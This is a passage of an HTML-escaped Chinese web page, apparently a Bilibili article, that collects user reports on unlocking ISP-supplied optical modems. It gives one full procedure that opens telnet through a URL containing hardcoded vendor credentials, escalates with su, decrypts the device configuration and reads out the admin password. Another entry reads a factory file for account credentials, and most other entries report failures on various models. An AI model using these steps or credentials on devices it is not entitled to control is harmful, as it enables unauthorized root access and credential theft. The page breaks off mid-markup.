data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;浙江移动：HX5-9sLite
1. 开启光猫的Telnet功能‌：通过浏览器访问http://192.168.1.1/usr=CMCCAdmin&amp;amp;psw=aDm8H%25MdA&amp;amp;cmd=1&amp;amp;telnet.gch，成功后会显示“TelnetSet Success!”。
2. telnet 192.168.1.1 输入用户名 CMCCAdmin 和密码 aDm8H%MdA
3. su 输入密码aDm8H%MdA
4. sidbg 1 DB decry /userconfig/cfg/db_user_cfg.xml
5. cat /var/tmp/debug-decry-cfg
6. 找到DevAuthInfo，拿到登录用户名: CMCCAdmin 密码: CMCCAdminLh5*n6Ew ，使用此密码可以登录网页&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;广西移动hs8546v6，开启telnet时，输入链接直接跳转到192.168.1.1，没有显示&amp;nbsp;&amp;nbsp;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 15px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;经排查，华为浏览器在跳转时会在原链接后面加入不存在的字符，删掉即可正常访问&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 15px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;湖南h6201m，先是按前面的操作，MAC记得大写，登陆的账号为root，密码则与up相同。密码直接复制粘贴回车即可，不显示是正常的。登陆后直接使用命令cat /flash/cfg/agentconf/factory.conf（来自评论区），然后复制保存起来，Telecom开头的就是账号密码。&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 15px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;移动H2-2 开启telnet 404 没反应 我直接恢复出厂设置把 远程管理里面的RMS服务器 关了 手动输入宽带密码 后面就正常 拿原来的超级管理员登陆&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;其他反馈:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;HG6543C4开启telnet开启成功但是账号密码错误admin和root都试过了&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;上海移动HN8145XR 没办法打开telnet 打开链接就跳转到路由器了&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;深圳移动 H2-3e无效，开启telnet一步正确抄写mac仍提示500 server error&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;四川移动HG6145D2在浏览器开启Telnet显示无权限。。。。&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;陕西移动光猫：HG6543C4
可以进入cmd，登陆成功，但是第四步输入：
load_cli factory
show admin_name
show admin_pwd
然后显示Unknown command，请问如何解决呢？&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;重庆。H220-S，提示404 Not Found&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;贵州移动
光猫：吉比特（ZXHN F663NV9）
第二步返回
404 Not Found
The requested URL was not found on this server.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;上海移动HUAWEI OptiXstar V173第一步的打开telnet，直接就进入web登录界面，不是开启telnet功能&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;广西移动H2-3 类型三，第二步失败，显示502 Bad Gateway
The CGI was not CGI/1.1 compliant.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica 